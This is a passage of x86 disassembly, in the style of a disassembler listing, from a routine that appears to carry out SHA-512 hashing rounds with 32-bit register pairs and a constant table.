mov [esp+170h+var_60], edx
loc_4151C7: ; CODE XREF: sub_4143D0+DE0�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F978[eax*8]
adc esi, ds:dword_41F97C[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_41540D
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415429
; ---------------------------------------------------------------------------
loc_41540D: ; CODE XREF: sub_4143D0+F41�j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415429: ; CODE XREF: sub_4143D0+103B�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F980[eax*8]
adc esi, ds:dword_41F984[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415651
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415660
; ---------------------------------------------------------------------------
loc_415651: ; CODE XREF: sub_4143D0+1196�j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415660: ; CODE XREF: sub_4143D0+127F�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F988[eax*8]
adc esi, ds:dword_41F98C[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41589B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4158B0
; ---------------------------------------------------------------------------
loc_41589B: ; CODE XREF: sub_4143D0+13D4�j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4158B0: ; CODE XREF: sub_4143D0+14C9�j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F990[eax*8]
adc esi, ds:dword_41F994[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415AE1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_415AF6
; ---------------------------------------------------------------------------
loc_415AE1: ; CODE XREF: sub_4143D0+1626�j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_415AF6: ; CODE XREF: sub_4143D0+170F�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F998[eax*8]
adc esi, ds:dword_41F99C[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_415D29
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_415D3E
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_4143D0+1868�j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_415D3E: ; CODE XREF: sub_4143D0+1957�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A0[eax*8]
adc esi, ds:dword_41F9A4[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_415F71
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_415F80
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_4143D0+1AB0�j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_415F80: ; CODE XREF: sub_4143D0+1B9F�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A8[eax*8]
adc esi, ds:dword_41F9AC[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4161C3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
